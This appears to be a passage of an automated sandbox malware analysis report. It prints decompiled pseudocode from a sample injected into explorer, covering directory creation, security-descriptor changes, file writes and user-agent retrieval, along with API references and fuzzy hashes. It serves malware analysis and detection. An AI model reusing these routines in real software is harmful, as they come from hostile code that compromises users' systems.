						_t71 = E000E2C57( &_v1084, __eflags);
					} else {
						E000EB054(_t54,  &_v564); // executed
						_t32 = E000E109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000E92C6( &_v1084);
						E000E85B6( &_v12);
					}
				} else {
					_t38 = E000E109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0xfe684; // 0x25bf8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E000E109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000E92C6( &_v564);
						E000E85B6( &_v8);
					} else {
						_t71 = E000E2C57( &_v44, _t78);
					}
					E000E85B6( &_v12);
				}
				_v8 = _t71;
				_t25 = E000EB2AB(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E000EB2AB(_t71) == 0) {
						E000E85FB( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}

0x000e2c91
0x000e2c93
0x000e2c96
0x000e2c9c
0x000e2ca5
0x000e2d29
0x000e2d2e
0x000e2d2f
0x000e2d31
0x000e2d82
0x000e2d33
0x000e2d39
0x000e2d43
0x000e2d48
0x000e2d4d
0x000e2d50
0x000e2d51
0x000e2d56
0x000e2d57
0x000e2d58
0x000e2d5f
0x000e2d60
0x000e2d6d
0x000e2d73
0x000e2d78
0x000e2ca7
0x000e2cac
0x000e2cb1
0x000e2cbf
0x000e2cc3
0x000e2cc8
0x000e2cce
0x000e2cd0
0x000e2ce0
0x000e2ce5
0x000e2cea
0x000e2ced
0x000e2cee
0x000e2cf3
0x000e2cf4
0x000e2cf5
0x000e2d02
0x000e2d08
0x000e2cd2
0x000e2cd7
0x000e2cd7
0x000e2d14
0x000e2d19
0x000e2d86
0x000e2d89
0x000e2d90
0x000e2d94
0x000e2d9c
0x000e2daf
0x000e2db4
0x000e2db8
0x000e2d9c
0x000e2dbd

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 000E2D94

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 08e3e1a773a7ac8a7afbe56aadc7ec62b1c9ceba56653b8e7d731dae820a6125
Instruction ID: 9959e659848e74ec3b60069fbf1434663d4314ff3dc9577cd9297d033fb5f69a
Opcode Fuzzy Hash: 08e3e1a773a7ac8a7afbe56aadc7ec62b1c9ceba56653b8e7d731dae820a6125
Instruction Fuzzy Hash: CB3190B2A14294AEDB18B7A2CC45AEE72ECAF44310F14015AF605F7182EF749F848B61

Uniqueness

Uniqueness Score: -1.00%

Function 000EBCBC, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E000EBCBC(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0xfe674; // 0x1e0
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000E95C2(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0xfe68c; // 0x25bfab8
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0xfe68c; // 0x25bfab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0xfe68c; // 0x25bfab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0xfe68c; // 0x25bfab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000E85B6( &_v24);
				return _t39;
			}

0x000ebcc3
0x000ebcc6
0x000ebcd1
0x000ebcd4
0x000ebcd7
0x000ebcda
0x000ebcdd
0x000ebce3
0x000ebce7
0x000ebcea
0x000ebceb
0x000ebced
0x000ebcee
0x000ebcfb
0x000ebd00
0x000ebd04
0x000ebd08
0x000ebd09
0x000ebd0e
0x000ebd19
0x000ebd1b
0x000ebd1e
0x000ebd23
0x000ebd24
0x000ebd25
0x000ebd26
0x000ebd28
0x000ebd2a
0x000ebd33
0x000ebd35
0x000ebd35
0x000ebd33
0x000ebd36
0x000ebd3f
0x000ebd3f
0x000ebd46
0x000ebd51

APIs

SetSecurityInfo.ADVAPI32(000001E0,00000006,00000010,00000000,00000000,00000000,?,?,000E325B,?,?,00000000,?,?,?,000E5714), ref: 000EBD2B

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: InfoSecurity
String ID:
API String ID: 3528565900-0
Opcode ID: 71278c90160193eb33c2eb2ef4422c8f0d5b7bbe942abcc98a03899419d8e44b
Instruction ID: fab6db8981bd12f637b8ab2b67aceaa59459dbcc7f370035047e05afa99292c7
Opcode Fuzzy Hash: 71278c90160193eb33c2eb2ef4422c8f0d5b7bbe942abcc98a03899419d8e44b
Instruction Fuzzy Hash: AD11E672A00259AFDB10DF95DC49EEEBBBCEF14740F10416AF505E7161EB709A01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000E5AF2, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E5AF2(void* __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t16;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t32;
				void* _t38;
				signed int _t39;
				intOrPtr* _t40;
				void* _t46;

				_t46 = __fp0;
				_t38 = __edx;
				_t39 = 0;
				_t16 = E000E85E5(0x14);
				_t32 =  *0xfe688; // 0x80000
				_t40 = _t16;
				if( *((short*)(_t32 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t32 + 0x228));
					_v34 =  *((intOrPtr*)(_t32 + 0x22a));
					_v32 =  *((intOrPtr*)(_t32 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t40 = 2;
				 *(_t40 + 4) = _t39;
				_t17 =  *0xfe688; // 0x80000
				 *((intOrPtr*)(_t40 + 8)) =  *((intOrPtr*)(_t17 + 0x224));
				_t18 = E000E5A6E( *((intOrPtr*)(_t17 + 0x224)), _t38, _t46);
				 *((intOrPtr*)(_t40 + 0xc)) = _t18;
				if(_t18 == 0) {
					L4:
					if(E000E2DBE() == 0) {
						goto L6;
					} else {
						_t39 = _t39 | 0xffffffff;
					}
				} else {
					_t38 = 0x3b;
					if(E000EA2AE(_t18, _t38) != 0) {
						L6:
						E000E4D60(_t40, _t38, _t46);
					} else {
						goto L4;
					}
				}
				E000EA389();
				E000EA389();
				return _t39;
			}

0x000e5af2
0x000e5af2
0x000e5afd
0x000e5aff
0x000e5b05
0x000e5b0b
0x000e5b15
0x000e5b1e
0x000e5b29
0x000e5b34
0x000e5b3a
0x000e5b42
0x000e5b42
0x000e5b48
0x000e5b4e
0x000e5b51
0x000e5b5c
0x000e5b5f
0x000e5b64
0x000e5b69
0x000e5b79
0x000e5b80
0x00000000
0x000e5b82
0x000e5b82
0x000e5b82
0x000e5b6b
0x000e5b6d
0x000e5b77
0x000e5b87
0x000e5b89
0x00000000
0x00000000
0x00000000
0x000e5b77
0x000e5b91
0x000e5b99
0x000e5ba4

APIs

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

GetDriveTypeW.KERNELBASE(?), ref: 000E5B42

Part of subcall function 000E4D60: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000E4DB3
Part of subcall function 000E4D60: GetModuleHandleA.KERNEL32(00000000), ref: 000E4DBA

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: HandleModule$AllocateDriveHeapType
String ID:
API String ID: 2730524069-0
Opcode ID: 0ffdc948d830df5babe6913aa961f62eac8750494989d2cd44a508d102e09d90
Instruction ID: 49c7b466941dd6e2677deac146e487ad393fe8e78c5c7613c12a996d6cf13026
Opcode Fuzzy Hash: 0ffdc948d830df5babe6913aa961f62eac8750494989d2cd44a508d102e09d90
Instruction Fuzzy Hash: A11101386007818ED724AFB2DC099EE73E8AF48728F04443DE815E7292FB359942CB55

Uniqueness

Uniqueness Score: -1.00%

Function 000EE492, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E000EE492(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0xfe6b0; // 0x2540d28
				if( *_t5 == 0) {
					_v8 = E000E95A8(0x2a7);
					 *0xfe788 = E000E9187(_t6, 0);
					E000E85A3( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E000E85E5(0x101);
					 *0xfe788 = _t10;
					_t11 =  *0xfe6b0; // 0x2540d28
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E000E85FB(0xfe788, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x000ee495
0x000ee496
0x000ee49e
0x000ee4e8
0x000ee4f5
0x000ee4fa
0x00000000
0x000ee4a0
0x000ee4a5
0x000ee4ac
0x000ee4b5
0x000ee4bc
0x000ee4c3
0x000ee4c7
0x000ee4ff
0x000ee502
0x000ee4c9
0x000ee4db
0x000ee4db
0x000ee4c7

APIs

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,000EE539), ref: 000EE4C3

Part of subcall function 000E85FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000E8641

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: 4262e5d8ac6e1e84eecc7fbd19a6ae53c4b99c0c14eed9a66c5d401038a80bd5
Instruction ID: 59ba248dfcdb287c3c862c42f9398945ff9380cbc4bc91b1e33b1994163fde3d
Opcode Fuzzy Hash: 4262e5d8ac6e1e84eecc7fbd19a6ae53c4b99c0c14eed9a66c5d401038a80bd5
Instruction Fuzzy Hash: CAF0C271604384EFF748EBB5DC06AA977E09B80360F204258E115E31E1EEB49A00E610

Uniqueness

Uniqueness Score: -1.00%

Function 000EA69E, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000EA69E(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

0x000ea69e
0x000ea6a1
0x000ea6a2
0x000ea6a5
0x000ea6a7
0x000ea6aa
0x000ea6af
0x000ea6e0
0x000ea6e2
0x000ea6b1
0x000ea6b1
0x000ea6b1
0x000ea6d3
0x00000000
0x00000000
0x000ea6d5
0x000ea6d8
0x000ea6de
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000ea6de
0x000ea6e7
0x000ea6e7
0x000ea6e3
0x000ea6e6

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000E8F32,?), ref: 000EA6CB

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 0dbb08c89f5fc5db7290708b15b58849f9ecd9f9e49d983c57a19775fb66f0ce
Instruction ID: 368cc4e33638a951bdd3f210621cc708f626927563689668bc2c5fd820887b02
Opcode Fuzzy Hash: 0dbb08c89f5fc5db7290708b15b58849f9ecd9f9e49d983c57a19775fb66f0ce
Instruction Fuzzy Hash: ADF01D72A10118BFDB10CF99C884BAA77ECEB0A780F154569B505E7100D670FE40D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 000EA639, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000EA639(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0xfe684; // 0x25bf8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x000ea643
0x000ea657
0x000ea65c
0x000ea665
0x000ea667
0x000ea671
0x000ea671
0x00000000
0x000ea677
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,000E8F1A), ref: 000EA654

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 788229538ee0d3429ae591bac47a751f30f6482d0191907fb277fec5cfe1acf4
Instruction ID: 8e34a7e7c0a042f3a5ca6aa898db058f0a9440a20727df8166d7a10b06bb1016
Opcode Fuzzy Hash: 788229538ee0d3429ae591bac47a751f30f6482d0191907fb277fec5cfe1acf4
Instruction Fuzzy Hash: 68E09AB27001587FF760166A9CC8F7B269CEB9A7F9F060271F611E71A0C620AC008271

Uniqueness

Uniqueness Score: -1.00%

Function 000EA67D, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000EA67D(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x000ea691
0x000ea694
0x000ea699
0x000ea69d

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,000EA70B,00000000,00000400,00000000,000EF8F7,000EF8F7,?,000EFA98,00000000), ref: 000EA691

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: baebcb7f7e803cadaf1f5f17fedb5db264feda2c333441d77912539a34c03c60
Instruction ID: b8e80512e99a03305c2ab868bb4e0a91651c7abc333adc48001f72140c27c9c2
Opcode Fuzzy Hash: baebcb7f7e803cadaf1f5f17fedb5db264feda2c333441d77912539a34c03c60
Instruction Fuzzy Hash: EED012B13A0100BEFB2C8B34CD5AF72329CDB10701F22025C7A06EA0E1CA69EA048720

Uniqueness

Uniqueness Score: -1.00%

Function 000E85E5, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E85E5(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xfe768, 8, _a4); // executed
				return _t2;
			}

0x000e85f3
0x000e85fa

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: deb03023d90f9462fc1b83b6da8726e0f5603496b00bd28941b3d6d62e5b013e
Instruction ID: 53d55158e24827ad40de62e2f6ba2d6f9cc7888716a9b0e824b98189173a2f75
Opcode Fuzzy Hash: deb03023d90f9462fc1b83b6da8726e0f5603496b00bd28941b3d6d62e5b013e
Instruction Fuzzy Hash: 58B09235084B08BBFE812B81ED05AA47F69EB04655F408010F608088708E6A6464EB80

Uniqueness

Uniqueness Score: -1.00%

Function 000EB2AB, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000EB2AB(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}

0x000eb2be

APIs

GetFileAttributesW.KERNELBASE(00000000,000E4E6E), ref: 000EB2B1

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: dd07f10621b7af12c487d12561ec82cefe57469b4900de7d6ff08c85c272a4ed
Instruction ID: 78f00b513b628e33c1343a9f759e158712613aa34ea6f6ea9eb94288a039fdbc
Opcode Fuzzy Hash: dd07f10621b7af12c487d12561ec82cefe57469b4900de7d6ff08c85c272a4ed
Instruction Fuzzy Hash: FEB092B62200404BCA185B38998485D32905F182313220758B033C64F1D624C950AA00

Uniqueness

Uniqueness Score: -1.00%

Function 000E85D0, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E85D0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0xfe768 = _t1;
				return _t1;
			}

0x000e85d9
0x000e85df
0x000e85e4

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,000E5F88), ref: 000E85D9

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 89c2a705255558915afcb96cf03e623f8920e6a6c922562b95ac591e0fb23d6a
Instruction ID: db216d3665f92262421a0febf20279c10f14fe29de722445dfbd0c3059132acf
Opcode Fuzzy Hash: 89c2a705255558915afcb96cf03e623f8920e6a6c922562b95ac591e0fb23d6a
Instruction Fuzzy Hash: 0FB01270684700A6F3902B209C06B107560A300B06F304001F704586E0CEB41004EB14

Uniqueness

Uniqueness Score: -1.00%

Function 000EFA01, Relevance: 1.4, APIs: 1, Instructions: 117
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000EFA01(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t25;
				char _t26;
				intOrPtr _t28;
				void* _t30;
				void* _t35;
				char _t37;
				intOrPtr _t38;
				char _t41;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr* _t62;
				intOrPtr _t65;
				char* _t66;
				intOrPtr _t68;
				char _t77;
				void* _t80;
				void* _t81;

				_t25 =  *0xfe654; // 0x25bfd30
				_t26 = E000E85E5( *((intOrPtr*)(_t25 + 4))); // executed
				_v12 = _t26;
				if(_t26 != 0) {
					_t62 =  *0xfe654; // 0x25bfd30
					if( *((intOrPtr*)(_t62 + 4)) > 0x400) {
						E000E86C2(_t26,  *_t62, 0x400);
						_v8 = 0;
						_t35 = E000E109A(_t62, 0x34a);
						_t65 =  *0xfe688; // 0x80000
						_t71 =  !=  ? 0x67d : 0x615;
						_t37 = E000E95C2(_t65,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t35);
						_t66 = "\\";
						_v24 = _t37;
						_push(_t66);
						_push(_t37);
						_t38 =  *0xfe688; // 0x80000
						_push(_t66);
						_v20 = E000E92C6(_t38 + 0x1020);
						_t41 = E000EA6EB( &_v8, _t40,  &_v8); // executed
						_v16 = _t41;
						E000E85B6( &_v24);
						E000E85B6( &_v20);
						_t72 = _v16;
						_t81 = _t80 + 0x3c;
						_t68 = _v8;
						if(_v16 != 0 && _t68 > 0x400) {
							_t50 =  *0xfe654; // 0x25bfd30
							_t51 =  *((intOrPtr*)(_t50 + 4));
							_t52 =  <  ? _t68 : _t51;
							_t53 = ( <  ? _t68 : _t51) + 0xfffffc00;
							E000E86C2(_v12 + 0x400, _t72 + 0x400, ( <  ? _t68 : _t51) + 0xfffffc00);
							_t68 = _v8;
							_t81 = _t81 + 0xc;
						}
						E000E85FB( &_v16, _t68);
						E000E85FB( &_v20, 0xfffffffe);
						_t26 = _v12;
						_t80 = _t81 + 0x10;
					}
					_t77 = 0;
					while(1) {
						_t28 =  *0xfe688; // 0x80000
						_t30 = E000EA7BF(_t28 + 0x228, _t26, 0x1000); // executed
						_t80 = _t80 + 0xc;
						if(_t30 >= 0) {
							break;
						}
						Sleep(1);
						_t77 = _t77 + 1;
						if(_t77 < 0x2710) {
							_t26 = _v12;
							continue;
						}
						break;
					}
					E000E85FB( &_v12, 0); // executed
				}
				return 0;
			}

0x000efa07
0x000efa0f
0x000efa14
0x000efa1a
0x000efa20
0x000efa33
0x000efa3d
0x000efa47
0x000efa4a
0x000efa4f
0x000efa65
0x000efa69
0x000efa6e
0x000efa6f
0x000efa70
0x000efa75
0x000efa78
0x000efa79
0x000efa7a
0x000efa7f
0x000efa8e
0x000efa93
0x000efa98
0x000efa9f
0x000efaa8
0x000efaad
0x000efab0
0x000efab3
0x000efab8
0x000efabe
0x000efac3
0x000efac8
0x000efacb
0x000efade
0x000efae3
0x000efae6
0x000efae6
0x000efaee
0x000efaf9
0x000efafe
0x000efb01
0x000efb01
0x000efb04
0x000efb06
0x000efb0c
0x000efb17
0x000efb1c
0x000efb21
0x00000000
0x00000000
0x000efb2a
0x000efb30
0x000efb37
0x000efb39
0x00000000
0x000efb39
0x00000000
0x000efb37
0x000efb43
0x000efb4c
0x000efb50

APIs

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,000EF8F7,?,?,?,000EFCF1,00000000), ref: 000EFB2A

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: f0e11628ce56ec0df643b1d541b3edb87a931eb958eda30e638860698e6de4d7
Instruction ID: 7085784bb8996cd5bb24c276ceaab1488b404006e851ea94b6a8e812fb2f63b8
Opcode Fuzzy Hash: f0e11628ce56ec0df643b1d541b3edb87a931eb958eda30e638860698e6de4d7
Instruction Fuzzy Hash: 46316D72A00249AFDB00EBA5CD85EAEB3BDEF44300B144579B505E7252EB34EA41C751

Uniqueness

Uniqueness Score: -1.00%

Function 000E8950, Relevance: 1.4, APIs: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E000E8950(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E000E85E5(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E000E85E5(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000E87CB(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E000E85FB( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0xfe684; // 0x25bf8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E000E85FB(_t73, 0);
						}
						E000E85FB( &_v20, 0);
						goto L1;
					}
					_t43 = E000EA6EB(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E000E87F6(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0xfe684; // 0x25bf8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E000E85FB( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}

0x000e8956
0x000e895d
0x000e895f
0x000e8967
0x000e8969
0x000e8971
0x000e8973
0x000e8976
0x000e8979
0x000e898d
0x000e8994
0x000e899a
0x000e89a3
0x000e89fb
0x000e8a00
0x000e8a09
0x000e8a56
0x000e8a59
0x000e8a61
0x000e8a65
0x000e8a65
0x000e8a6a
0x00000000
0x000e8a6a
0x000e8a0b
0x000e8a0d
0x000e8a15
0x000e8a1b
0x000e8a1c
0x000e8a1c
0x000e8a24
0x000e8a27
0x000e8a2c
0x000e8a2c
0x000e8a2f
0x000e8a38
0x000e8a3d
0x000e8a43
0x000e8a4a
0x00000000
0x000e8a50
0x000e89ac
0x000e89b1
0x000e89b3
0x000e89ba
0x00000000
0x00000000
0x000e89cf
0x00000000
0x000e89d1
0x000e89d1
0x000e89dc
0x000e89df
0x000e89ec
0x00000000
0x000e89f2
0x000e89cf
0x000e897b
0x00000000

APIs

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000E899A

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
API String ID: 680773602-0
Opcode ID: 24203de9b6d72bddcfc287943f3152fa289a52ef35970fd40f962aa34e6cb203
Instruction ID: 633632d471877affb828f11a5aef939b8f103ef54f8d04517b8196c94ad1fd3d
Opcode Fuzzy Hash: 24203de9b6d72bddcfc287943f3152fa289a52ef35970fd40f962aa34e6cb203
Instruction Fuzzy Hash: 5F31CA72A04744AFE7149B66DC41BDE77E8EF44710F24802AF649F7182DF30AA01C759

Uniqueness

Uniqueness Score: -1.00%

Function 000EE308, Relevance: 1.3, APIs: 1, Instructions: 92
sleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000EE308(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0xfe6b4; // 0x25bfa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0xfe6b4; // 0x25bfa98
